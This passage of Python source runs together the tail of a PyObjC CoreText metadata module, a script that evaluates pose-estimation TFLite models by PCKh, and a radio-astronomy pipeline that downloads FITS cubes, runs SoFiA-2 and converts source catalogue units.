(sel32or64(b'v^{__CTFrame=}{_CFRange=ll}^{_NSPoint=ff}', b'v^{__CTFrame=}{_CFRange=qq}^{CGPoint=dd}'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontCreateWithName': (sel32or64(b'^{__CTFont=}^{__CFString=}f^{CGAffineTransform=ffffff}', b'^{__CTFont=}^{__CFString=}d^{CGAffineTransform=dddddd}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFramesetterGetTypesetter': (b'^{__CTTypesetter=}^{__CTFramesetter=}',), 'CTGlyphInfoCreateWithGlyphName': (b'^{__CTGlyphInfo=}^{__CFString=}^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateCopyWithSymbolicTraits': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}II', '', {'retval': {'already_cfretained': True}}), 'CTLineGetBoundsWithOptions': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTLine=}L', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTLine=}Q'),), 'CTFontCopyGraphicsFont': (b'^{CGFont=}^{__CTFont=}^^{__CTFontDescriptor}', '', {'retval': {'already_cfretained': True}, 'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateMatchingFontDescriptorsForFamily': (b'^{__CFArray=}^{__CTFontCollection=}^{__CFString=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetXHeight': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTRunGetPositions': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^{_NSPoint=ff}', b'v^{__CTRun=}{_CFRange=qq}^{CGPoint=dd}'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontDescriptorCreateCopyWithVariation': (sel32or64(b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFNumber=}f', b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFNumber=}d'), '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateWithAttributes': (b'^{__CTFontDescriptor=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCollectionCreateMatchingFontDescriptors': (b'^{__CFArray=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTTextTabGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontManagerUnregisterFontsForURLs': (b'B^{__CFArray=}I^^{__CFArray=}', '', {'arguments': {2: {'type_modifier': 'o'}}}), 'CTFontCreateCopyWithSymbolicTraits': (sel32or64(b'^{__CTFont=}^{__CTFont=}f^{CGAffineTransform=ffffff}II', b'^{__CTFont=}^{__CTFont=}d^{CGAffineTransform=dddddd}II'), '', {'retval': {'already_cfretained': True}}), 'CTFontCopyTraits': (b'^{__CFDictionary=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDraw': (sel32or64(b'v^{__CTRun=}^{CGContext=}{_CFRange=ll}', b'v^{__CTRun=}^{CGContext=}{_CFRange=qq}'),), 'CTLineGetStringIndexForPosition': (sel32or64(b'l^{__CTLine=}{CGPoint=ff}', b'q^{__CTLine=}{CGPoint=dd}'),), 'CTFontDescriptorCopyAttributes': (b'^{__CFDictionary=}^{__CTFontDescriptor=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetLeading': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTRunGetGlyphs': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^S', b'v^{__CTRun=}{_CFRange=qq}^S'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateWithFontDescriptors': (b'^{__CTFontCollection=}^{__CFArray=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDelegateCreate': (sel32or64(b'^{__CTRunDelegate=}^{_CTRunDelegateCallbacks=l^?^?^?^?}^v', b'^{__CTRunDelegate=}^{_CTRunDelegateCallbacks=q^?^?^?^?}^v'), '', {'retval': {'already_cfretained': 
True}}), 'CTTypesetterCreateLineWithOffset': (sel32or64(b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=ll}d', b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=qq}d'), '', {'retval': {'already_cfretained': True}}), 'CTFontGetUnderlinePosition': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTRunGetTypographicBounds': (sel32or64(b'd^{__CTRun=}{_CFRange=ll}^f^f^f', b'd^{__CTRun=}{_CFRange=qq}^d^d^d'), '', {'arguments': {2: {'type_modifier': 'o'}, 3: {'type_modifier': 'o'}, 4: {'type_modifier': 'o'}}}), 'CTTypesetterCreateWithAttributedString': (b'^{__CTTypesetter=}^{__CFAttributedString=}', '', {'retval': {'already_cfretained': True}}), 'CTLineCreateWithAttributedString': (b'^{__CTLine=}^{__CFAttributedString=}', '', {'retval': {'already_cfretained': True}}), 'CTTextTabGetAlignment': (b'C^{__CTTextTab=}',), 'CTFontCopyName': (b'^{__CFString=}^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetSlantAngle': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFramesetterSuggestFrameSizeWithConstraints': (sel32or64(b'{CGSize=ff}^{__CTTypesetter=}{_CFRange=ll}@{CGSize=ff}^{_CFRange=ll}', b'{CGSize=dd}^{__CTTypesetter=}{_CFRange=qq}@{CGSize=dd}^{_CFRange=qq}'), '', {'arguments': {4: {'type_modifier': 'o'}}}), 'CTFontCollectionCopyFontAttributes': (b'^{__CFArray=}^{__CTFontCollection=}^{__CFSet=}I', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerRegisterFontsForURLs': (b'B^{__CFArray=}I^^{__CFArray=}', '', {'arguments': {2: {'type_modifier': 'o'}}}), 'CTRubyAnnotationGetOverhang': (b'C^{__CTRubyAnnotation=}',), 'CTFontCopyFeatures': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreateForString': (sel32or64(b'^{__CTFont=}^{__CTFont=}^{__CFString=}{_CFRange=ll}', b'^{__CTFont=}^{__CTFont=}^{__CFString=}{_CFRange=qq}'), '', {'retval': {'already_cfretained': True}}), 'CTGlyphInfoGetGlyphName': (b'^{__CFString=}^{__CTGlyphInfo=}',), 'CTParagraphStyleGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCreateUIFontForLanguage': (sel32or64(b'^{__CTFont=}If^{__CFString=}', b'^{__CTFont=}Id^{__CFString=}'), '', {'retval': {'already_cfretained': True}}), 'CTFontManagerCopyAvailableFontFamilyNames': (b'^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTFrameGetVisibleStringRange': (sel32or64(b'{_CFRange=ll}^{__CTFrame=}', b'{_CFRange=qq}^{__CTFrame=}'),), 'CTFontManagerRegisterFontsWithAssetNames': (b'v^{__CFArray=}^{__CFBundle=}IB@?', '', {'arguments': {4: {'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTLineGetTypeID': (sel32or64(b'L', b'Q'),), 'CTRunGetPositionsPtr': (sel32or64(b'r^{_NSPoint=ff}^{__CTRun=}', b'r^{CGPoint=dd}^{__CTRun=}'), '', {'retval': {'c_array_of_variable_length': True}})} aliases = {'kCTFontItalicTrait': 'kCTFontTraitItalic', 'kCTFontMessageFontType': 'kCTFontUIFontMessage', 'kCTNaturalTextAlignment': 'kCTTextAlignmentNatural', 'kCTFontDefaultOrientation': 'kCTFontOrientationDefault', 'kCTFontVerticalTrait': 'kCTFontTraitVertical', 'kFontChineseScript': 'kFontTraditionalChineseScript', 'kCTFontToolbarFontType': 'kCTFontUIFontToolbar', 'kCTFontClarendonSerifsClass': 'kCTFontClassClarendonSerifs', 'kCTFontCondensedTrait': 'kCTFontTraitCondensed', 'kCTIdentityMappingCharacterCollection': 'kCTCharacterCollectionIdentityMapping', 'kFontEthiopicScript': 'kFontGeezScript', 'kCTFontEmphasizedSystemFontType': 'kCTFontUIFontEmphasizedSystem', 'kCTFontSlabSerifsClass': 'kCTFontClassSlabSerifs', 'CT_AVAILABLE_BUT_DEPRECATED': 
'__OSX_AVAILABLE_BUT_DEPRECATED', 'CT_AVAILABLE_STARTING': '__OSX_AVAILABLE_STARTING', 'kCTFontVerticalOrientation': 'kCTFontOrientationVertical', 'kCTFontEmphasizedSystemDetailFontType': 'kCTFontUIFontEmphasizedSystemDetail', 'kCTFontWindowTitleFontType': 'kCTFontUIFontWindowTitle', 'kCTFontOldStyleSerifsClass': 'kCTFontClassOldStyleSerifs', 'kCTFontExpandedTrait': 'kCTFontTraitExpanded', 'kCTAdobeGB1CharacterCollection': 'kCTCharacterCollectionAdobeGB1', 'kCTFontUtilityWindowTitleFontType': 'kCTFontUIFontUtilityWindowTitle', 'kCTFontColorGlyphsTrait': 'kCTFontTraitColorGlyphs', 'kCTFontUserFontType': 'kCTFontUIFontUser', 'kCTFontModernSerifsClass': 'kCTFontClassModernSerifs', 'kCTFontMiniEmphasizedSystemFontType': 'kCTFontUIFontMiniEmphasizedSystem', 'kCTFontApplicationFontType': 'kCTFontUIFontApplication', 'CT_DEPRECATED_ENUMERATOR': '__CT_DEPRECATED_ENUMERATOR', 'kCTFontScriptsClass': 'kCTFontClassScripts', 'kCTFontFreeformSerifsClass': 'kCTFontClassFreeformSerifs', 'kCTFontMiniSystemFontType': 'kCTFontUIFontMiniSystem', 'kCTFontSystemDetailFontType': 'kCTFontUIFontSystemDetail', 'kCTFontManagerScopeUser': 'kCTFontManagerScopePersistent', 'kCTFontMenuItemMarkFontType': 'kCTFontUIFontMenuItemMark', 'kFontSindhiScript': 'kFontExtendedArabicScript', 'kCTRunDelegateCurrentVersion': 'kCTRunDelegateVersion1', 'kCTFontOrnamentalsClass': 'kCTFontClassOrnamentals', 'kCTFontPaletteFontType': 'kCTFontUIFontPalette', 'kCTFontControlContentFontType': 'kCTFontUIFontControlContent', 'kCTFontMenuTitleFontType': 'kCTFontUIFontMenuTitle', 'kFontRussian': 'kFontCyrillicScript', 'kCTFontToolTipFontType': 'kCTFontUIFontToolTip', 'kCTFontTransitionalSerifsClass': 'kCTFontClassTransitionalSerifs', 'kCTFontLabelFontType': 'kCTFontUIFontLabel', 'kCTLeftTextAlignment': 'kCTTextAlignmentLeft', 'kCTAdobeKorea1CharacterCollection': 'kCTCharacterCollectionAdobeKorea1', 'kCTFontNoFontType': 'kCTFontUIFontNone', 'kCTFontUserFixedPitchFontType': 'kCTFontUIFontUserFixedPitch', 'kCTCenterTextAlignment': 'kCTTextAlignmentCenter', 'kCTAdobeJapan2CharacterCollection': 'kCTCharacterCollectionAdobeJapan2', 'kCTFontSmallSystemFontType': 'kCTFontUIFontSmallSystem', 'kCTFontMonoSpaceTrait': 'kCTFontTraitMonoSpace', 'kFontLatvianLanguage': 'kFontLettishLanguage', 'kCTFontSansSerifClass': 'kCTFontClassSansSerif', 'kCTJustifiedTextAlignment': 'kCTTextAlignmentJustified', 'kFontPersianLanguage': 'kFontFarsiLanguage', 'kCTFontAlertHeaderFontType': 'kCTFontUIFontAlertHeader', 'kCTFontBoldTrait': 'kCTFontTraitBold', 'kFontLappishLanguage': 'kFontSaamiskLanguage', 'kCTFontSmallEmphasizedSystemFontType': 'kCTFontUIFontSmallEmphasizedSystem', 'kCTFontSymbolicClass': 'kCTFontClassSymbolic', 'kCTFontMenuItemCmdKeyFontType': 'kCTFontUIFontMenuItemCmdKey', 'kCTAdobeCNS1CharacterCollection': 'kCTCharacterCollectionAdobeCNS1', 'kCTFontCompositeTrait': 'kCTFontTraitComposite', 'kCTFontUnknownClass': 'kCTFontClassUnknown', 'kCTFontUIOptimizedTrait': 'kCTFontTraitUIOptimized', 'kCTFontClassMaskTrait': 'kCTFontTraitClassMask', 'kCTFontMenuItemFontType': 'kCTFontUIFontMenuItem', 'kCTAdobeJapan1CharacterCollection': 'kCTCharacterCollectionAdobeJapan1', 'kCTFontPushButtonFontType': 'kCTFontUIFontPushButton', 'kCTFontSystemFontType': 'kCTFontUIFontSystem', 'kFontEastEuropeanRomanScript': 'kFontSlavicScript', 'kCTFontSmallToolbarFontType': 'kCTFontUIFontSmallToolbar', 'kCTFontHorizontalOrientation': 'kCTFontOrientationHorizontal', 'kFontOromoLanguage': 'kFontGallaLanguage', 'kCTRightTextAlignment': 'kCTTextAlignmentRight', 'kFontAmharicScript': 
'kFontGeezScript', 'kCTFontViewsFontType': 'kCTFontUIFontViews'} cftypes=[('CTFontCollectionRef', b'^{__CTFontCollection=}', 'CTFontCollectionGetTypeID', 'NSCTFontCollection'), ('CTFontDescriptorRef', b'^{__CTFontDescriptor=}', 'CTFontDescriptorGetTypeID', 'NSCTFontDescriptor'), ('CTFontRef', b'^{__CTFont=}', 'CTFontGetTypeID', 'NSCTFont'), ('CTFrameRef', b'^{__CTFrame=}', 'CTFrameGetTypeID', None), ('CTFramesetterRef', b'^{__CTFramesetter=}', 'CTFramesetterGetTypeID', None), ('CTGlyphInfoRef', b'^{__CTGlyphInfo=}', 'CTGlyphInfoGetTypeID', 'NSCTGlyphInfo'), ('CTLineRef', b'^{__CTLine=}', 'CTLineGetTypeID', None), ('CTParagraphStyleRef', b'^{__CTParagraphStyle=}', 'CTParagraphStyleGetTypeID', None), ('CTRubyAnnotationRef', b'^{__CTRubyAnnotation=}', None, None), ('CTRunDelegateRef', b'^{__CTRunDelegate=}', 'CTRunDelegateGetTypeID', None), ('CTRunRef', b'^{__CTRun=}', 'CTRunGetTypeID', None), ('CTTextTabRef', b'^{__CTTextTab=}', 'CTTextTabGetTypeID', None), ('CTTypesetterRef', b'^{__CTTypesetter=}', 'CTTypesetterGetTypeID', None)] expressions = {} # END OF FILE
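# A minimal, hypothetical sketch of how framework metadata in this layout can be
# inspected: the module above packs constant/enum definitions into a string and
# describes the CoreText C API through the `functions`, `aliases`, `cftypes` and
# `expressions` dictionaries. The helper below only assumes that `functions` is in
# scope exactly as defined above; it uses plain dict access and no PyObjC API.
def _cfretained_functions(funcs):
    """Return the names of entries whose return value is flagged 'already_cfretained',
    i.e. calls that hand ownership of the returned CF object to the caller."""
    names = []
    for name, spec in funcs.items():
        # Each value is a tuple; when present, the third element is a metadata dict.
        extra = spec[2] if len(spec) > 2 else {}
        if extra.get('retval', {}).get('already_cfretained'):
            names.append(name)
    return sorted(names)

# Hypothetical usage:
# print(len(_cfretained_functions(functions)), 'entries return +1 retained objects')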
# Copyright 2019 Doyoung Gwak (tucan.dev@gmail.com) # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ====================== #-*- coding: utf-8 -*- import os import math # from scipy.ndimage.filters import gaussian_filter import tensorflow as tf tf.random.set_seed(3) import numpy as np def convert_heatmap_to_keypoint(heatmap, image_size): # heatmap = gaussian_filter(heatmap, sigma=5) idx = np.unravel_index(np.argmax(heatmap), heatmap.shape) x_idx = idx[1] / heatmap.shape[1] y_idx = idx[0] / heatmap.shape[0] return int(x_idx * image_size[1]), int(y_idx * image_size[0]) # exchange y, x sequence def convert_heatmaps_to_keypoints(heatmaps, image_size): kp_num = heatmaps.shape[-1] return [convert_heatmap_to_keypoint(heatmaps[:, :, kp_index], image_size) for kp_index in range(kp_num)] # head_index = 0 # neck_index = 1 # kp_sequences = [1, 2, 4, 6, 8, 3, 5, 7, 10, 12, 14, 9, 11, 13] # kp_sequences = [1, 2, 3, 4] # kp_sequences = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14] head_index = 0 # nose for coco neck_index = 4 # right ear for coco kp_sequences = list(range(1, 17+1)) # for coco def calculate_pckh(original_image_shape, keypoint_info, pred_heatmaps, distance_ratio=0.5): number_of_keypoints = pred_heatmaps.shape[-1] # pred heatmap -> coordinate pred_coords = convert_heatmaps_to_keypoints(pred_heatmaps, original_image_shape) # (x, y)s # gt coordinate gt_coords = np.array(keypoint_info["keypoints"]) gt_coords = np.reshape(gt_coords, (number_of_keypoints, 3)) # head coordinate kp0 = gt_coords[head_index, 0:2] # neck coordinate kp1 = gt_coords[neck_index, 0:2] threshold_dist = math.sqrt((kp0[0] - kp1[0]) ** 2 + (kp0[1] - kp1[1]) ** 2) threshold_dist *= distance_ratio scores = [] for kp_index in range(number_of_keypoints): pred_x, pred_y = pred_coords[kp_index] gt_x, gt_y, _ = gt_coords[kp_sequences[kp_index] - 1, :] d = math.sqrt((pred_x - gt_x) ** 2 + (pred_y - gt_y) ** 2) if d < threshold_dist: scores.append(1.0) # each_scores[kp_index].append(1.0) else: scores.append(0.0) # each_scores[kp_index].append(0.0) score = np.mean(scores) # print(f'img_id = {keypoint_info["image_id"]}, threshold = {threshold_dist:.2f}, score = {score:.3f}') return score def save_tflite(saved_model_path, tflite_model_path=None): if tflite_model_path is None: # Make tflite dir tflite_model_dir_path = os.path.join(os.path.dirname(saved_model_path), 'tflite') if not os.path.exists(tflite_model_dir_path): os.mkdir(tflite_model_dir_path) # tflite file filename = saved_model_path.split('/')[-1] filename = filename.split('.')[0] step = filename.split('-')[-1] model_name = saved_model_path.split('/')[-2] tflite_filename = f'{model_name}-{step}.tflite' tflite_model_path = os.path.join(tflite_model_dir_path, tflite_filename) # Convert the model. converter = tf.lite.TFLiteConverter.from_saved_model(saved_model_path) tflite_model = converter.convert() # Save the TF Lite model. 
with tf.io.gfile.GFile(tflite_model_path, 'wb') as f: f.write(tflite_model) print(f'Saved TFLite on: {tflite_model_path}') return tflite_model_path import json import cv2 import datetime from evaluate_tflite import TFLiteModel from common import get_time_to_str from functools import reduce import multiprocessing num_processes = multiprocessing.cpu_count() // 2 if num_processes <= 0: num_processes = 1 manager = multiprocessing.Manager() shared_count_list = manager.list([0]) def calculate_total_pckh_multiprocess(args): tflite_model_path, images_path, distance_ratio, keypoint_infos, image_infos = args # Load tflite model output_index = -1 # 3 model = TFLiteModel(tflite_model_path=tflite_model_path, output_index=output_index) # Evaluate # each_scores = [[] for _ in range(14)] total_scores = [] for keypoint_info in keypoint_infos: # print(keypoint_info.keys()) # ['num_keypoints', 'area', 'keypoints', 'bbox', 'image_id', 'category_id', 'id'] image_info = image_infos[keypoint_info["image_id"]] image_path = os.path.join(images_path, image_info["file_name"]) # Load original image original_image = cv2.imread(image_path) # Resize image resized_image = cv2.resize(original_image, (model.input_shape[1], model.input_shape[2])) resized_image = np.array(resized_image, dtype=np.float32) input_data = np.expand_dims(resized_image, axis=0) pred_heatmaps = model.inference(input_data) pred_heatmaps = np.squeeze(pred_heatmaps) score = calculate_pckh(original_image_shape=original_image.shape, keypoint_info=keypoint_info, pred_heatmaps=pred_heatmaps, distance_ratio=distance_ratio) # print(f'img_id = {keypoint_info["image_id"]}, score = {score:.3f}') total_scores.append(score) # print(f"{np.mean(total_scores):.2f}") # batch_scores.append(score) return total_scores def calculate_total_pckh(saved_model_path=None, tflite_model_path=None, annotation_path=None, images_path=None, distance_ratio=0.5): # timestamp _start_time = datetime.datetime.now() # Convert to tflite if tflite_model_path is None: tflite_model_path = save_tflite(saved_model_path=saved_model_path) # Load annotation json annotation_dict = json.load(open(annotation_path)) image_infos = {} for img_info in annotation_dict["images"]: image_infos[img_info["id"]] = img_info keypoint_infos = annotation_dict["annotations"] # category_infos = annotation_dict["categories"] chunk_size = len(keypoint_infos) // (num_processes * 2) chunks = [[]] for keypoint_info in keypoint_infos: chunks[-1].append(keypoint_info) if len(chunks[-1]) >= chunk_size: chunks.append([]) chunks = list(map(lambda chunk: (tflite_model_path, images_path, distance_ratio, chunk, image_infos), chunks)) print(f"START EVAL in {num_processes} processes, {len(chunks)} chunks") pool = multiprocessing.Pool(processes=num_processes) scores_list = pool.map(calculate_total_pckh_multiprocess, chunks) total_scores = reduce(lambda x, y: x+y, scores_list) total_score = np.mean(total_scores) # timestamp _end_time = datetime.datetime.now() _process_time = _end_time - _start_time print(f' ------> PCKh@{distance_ratio:.1f}: {total_score * 100.0:.2f}%, duration: {get_time_to_str(_process_time.total_seconds())} <------') return total_score if __name__ == '__main__': # saved_model_path = "/Volumes/tucan-SSD/ml-project/experiment002/ai_challenger/06120948_hourglass_hg/saved_model-055000" tflite_model_path = "/Users/doyounggwak/projects/machine-learning/github/PoseEstimationForMobile/release/cpm_model/model.tflite" dataset_path = "/Volumes/tucan-SSD/datasets/ai_challenger/valid" annotation_path = os.path.join(dataset_path, 
"annotation.json") images_path = os.path.join(dataset_path, "images") distance_ratio = 0.5 calculate_total_pckh(tflite_model_path=tflite_model_path, annotation_path=annotation_path, images_path=images_path, distance_ratio=distance_ratio)
import os import sys import shutil import re from datetime import datetime import numpy as np import pandas as pd #import matplotlib.pyplot as plt import yaml from astropy.io import fits from astropy.wcs import WCS from shutil import which set_type ='evaluation' #set_type ='development_small' #set_type= 'debug' run_fat = False type = {'evaluation': {'dir': 'evaluation', 'file': 'sky_eval'}, 'development_small': {'dir': 'development_small', 'file': 'sky_dev'}, 'debug': {'dir': 'debug', 'file': 'test'}, } main_dir = './' data_parameters = './parameters/data.yml' param_development_small = './parameters/sofia_dev_small.par' fitsfile = f'''{main_dir}/{type[set_type]['dir']}/{type[set_type]['file']}.fits''' with open(data_parameters, "r") as f: data_yml = yaml.load(f, Loader=yaml.FullLoader) fitsfile = f'''{main_dir}/{data_yml['data_path']}/{type[set_type]['dir']}/{type[set_type]['file']}.fits''' data_path = f'''{main_dir}/{data_yml['data_path']}/{type[set_type]['dir']}''' if not os.path.isdir(f'''{main_dir}/{data_yml['data_path']}'''): os.mkdir(f'''{main_dir}/{data_yml['data_path']}''') results_path = f'''{main_dir}/results''' dev_small_cat = f'''{results_path}/{set_type}_small_cat.txt''' final_cat = f'''{results_path}/final_catalogue_{set_type}.csv''' ###### Constants to use f0 = 1420405751.786 #Hz (HI rest frequency) c = 299792.458 #km/s (speed of light) # Functions def is_tool(name): """Check whether `name` is on PATH and marked as executable.""" return which(name) is not None def download_data(data_parameters, type = 'debug', force=False): if force and os.path.isdir(data_path): shutil.rmtree(data_path) if not os.path.isdir(data_path): os.mkdir(data_path) else: if os.path.isfile(fitsfile): print(f'There is no need to download {fitsfile} as it already exists') # This could be expanded to check for the readme and continuum return for filename in data_yml['download_locations'][type]['files']: pathname = data_yml['download_locations'][type]['path'] command = f'wget --no-check-certificate "{pathname}download?path=%2F&files={filename}" -O {data_path}/{filename}' print(command) os.system(command) def run_sofia(parameters, outputdir): """Only executed if the output catalog does not exist""" #It makes sense to not run this when the results exist but maybe a check on an existing catalog is better if not os.path.isfile(os.path.join(results_path, outputdir,f'{outputdir}_cat.txt')): if not os.path.isdir(os.path.join(results_path, outputdir)): os.mkdir(os.path.join(results_path, outputdir)) # I guess the 2 is because of my dual installation of SoFiA versions we should implement a version check if is_tool('sofia2'): os.system(f"sofia2 {parameters}") elif is_tool('sofia'): os.system(f"sofia {parameters}") else: print('sofia not available. 
Please install Sofia-2') sys.exit(1) command = f'mv {parameters} {os.path.join(results_path, outputdir)}/sofia_input_parameters.par' print(command) os.system(command) else: print(f'''We have already found the catalogue {os.path.join(results_path, outputdir,f'{outputdir}_cat.txt')}, continuing to process.''' ) return def read_sofia_header(filename): with open(filename, 'r') as f: head_line = f.readlines()[10] head = re.split('\s+', head_line.strip('\n'))[1:] # 1: to remove # return head def sofia2cat(catalog): head = read_sofia_header(catalog) raw_cat = pd.read_csv(catalog, delim_whitespace=True, header=None, names=head, comment='#') raw_cat.sort_values(by='f_sum', ascending=False, inplace=True) raw_cat_filtered = raw_cat[raw_cat['kin_pa']>0] print('Sofia raw catalog filtered:') if 'freq' in raw_cat_filtered: print(raw_cat_filtered[['x', 'y', 'ell_maj', 'ell_min', 'f_sum', 'freq', 'kin_pa', 'w20']]) elif 'v_app' in raw_cat_filtered: print(raw_cat_filtered[['x', 'y', 'ell_maj', 'ell_min', 'f_sum', 'v_app', 'kin_pa', 'w20']]) return raw_cat_filtered def pix2coord(wcs, x, y): coord = wcs.pixel_to_world(x, y, 1) #print('coord') #print(coord) return coord[0].ra.deg, coord[0].dec.deg def compute_inclination(bmaj, bmin): # returns an angle in degrees return np.arctan2(bmin, bmaj)*180./np.pi def convert_units(raw_cat, fitsfile): f = fits.open(fitsfile) wcs=WCS(f[0].header) f.close() # Convert x,y in pixels to R.A.,Dec. in deg ra_deg, dec_deg = pix2coord(wcs, raw_cat['x'], raw_cat['y']) # Get pixel size pix2arcsec = wcs.wcs.get_cdelt()[1]*3600. # This assumes same pixel size in both direction pix2freq = f[0].header['CDELT3'] return ra_deg, dec_deg, pix2arcsec,pix2freq def frequency_to_vel(freq, invert=False): if not invert: return c*((f0**2-freq**2)/(f0**2+freq**2)) else: return f0*np.sqrt((1-freq/c)/(1+freq/c)) def convert_flux(flux,filename): #This assume that flux comes from SoFiA in Jy/beam and converts it to Jy * km/s base on the header hdr = fits.getheader(filename) print(hdr['BMAJ'],hdr['BMIN']) beamarea=(np.pi*abs(hdr['BMAJ']*hdr['BMIN']))/(4.*np.log(2.)) pix_per_beam = beamarea/(abs(hdr['CDELT1'])*abs(hdr['CDELT2'])) #cdelt_vel = abs(-c*float(hdr['CDELT3'])/f0) cdelt_hz = float(hdr['CDELT3']) return flux/pix_per_beam*cdelt_hz #Jy * hz # Convert the frequency axis of a cube def convert_frequency_axis(filename, outname, velocity_req = 'radio'): c_ms = c*1000. 
print(filename) cube = fits.open(filename) hdr = cube[0].header # Check we have a proper third axis if hdr['CTYPE3'].lower() != 'freq' or hdr['NAXIS'] < 3: print('We cannot convert this axis as it is not a frequency axis') return # get central values crpix = float(hdr['CRPIX3']) crval = float(hdr['CRVAL3']) naxis_len = float(hdr['NAXIS3']) # make sure the central pixel is rather central else large errors are introduced in both vrad and rel if naxis_len/2.-5 < crpix < naxis_len/2.+5: hdr_wcs = WCS(hdr) centralx, centraly, new_freq = hdr_wcs.wcs_pix2world(hdr['CRPIX1'], hdr['CRPIX2'], naxis_len/2., 1) hdr['CRPIX3'] = naxis_len/2. crval = new_freq #Now convert if velocity_req == 'radio': # convert from frequency to radio velocity cdelt_vel = -c_ms*float(hdr['CDELT3'])/f0 crval_vel = c_ms*(1-crval/f0) # https://fits.gsfc.nasa.gov/standard40/fits_standard40aa-le.pdf hdr['CTYPE3'] = 'VRAD' elif velocity_req == 'relativistic': # This should always only ever be used for cubes with small velocity range crval_vel = frequency_to_vel(crval) freq_step = float(hdr['CDELT3']) central_two = frequency_to_vel(crval+freq_step) lower_one = frequency_to_vel(crval-(naxis_len/2.)*freq_step) lower_two = frequency_to_vel(crval-(naxis_len/2.+1)*freq_step) upper_one = frequency_to_vel(crval+(naxis_len/2.-1.)*freq_step) upper_two = frequency_to_vel(crval+(naxis_len/2.)*freq_step) cdelt_vel = np.mean([central_two-crval_vel,lower_two-lower_one,upper_two-upper_one])*1000. if abs(cdelt_vel)*naxis_len > 1e6: print('This cube is too big for a relativistic conversion') return hdr['CTYPE3'] = 'VELO' else: print("We don't do those things here.") return hdr['CDELT3'] = cdelt_vel hdr['CRVAL3'] = crval_vel if 'CUNIT3' in hdr: # delete cunit3 because we adopt the default units = m/s del hdr['CUNIT3'] fits.writeto(outname,cube[0].data,hdr,overwrite = True) def process_catalog(raw_cat, fitsfile): # Unit conversion ra_deg, dec_deg, pix2arcsec,pix2vel = convert_units(raw_cat, fitsfile) hi_size = raw_cat['ell_maj']*pix2arcsec # Estimate inclination based on fitted ellipsoid, assuming the galaxy is intrinsically circular inclination = compute_inclination(raw_cat['ell_maj'], raw_cat['ell_min']) # Construct the output catalog processed_cat = pd.DataFrame() processed_cat['id'] = raw_cat['id'] processed_cat['ra'] = ra_deg processed_cat['dec'] = dec_deg processed_cat['hi_size'] = hi_size processed_cat['line_flux_integral'] = convert_flux(raw_cat['f_sum'],fitsfile) # Now converted to Jy*km/s, verification for development needed if 'freq' in raw_cat: processed_cat['central_freq'] = raw_cat['freq'] #processed_cat['central_velocity'] = frequency_to_vel(raw_cat['freq']) processed_cat['w20'] = frequency_to_vel(raw_cat['freq']-raw_cat['w20']/2.*pix2vel)-frequency_to_vel(raw_cat['freq']+raw_cat['w20']/2.*pix2vel) # we need to clarify if the units and the definition are the same else: #processed_cat['central_velocity'] = raw_cat['v_app'] processed_cat['central_freq'] = frequency_to_vel(raw_cat['v_app'],invert=True) processed_cat['w20'] = raw_cat['w20']*pix2vel # we need to clarify if what sofia gives is the central freq processed_cat['pa'] = raw_cat['kin_pa'] # we need to clarify if Sofia kinematic angle agrees with their P.A. 
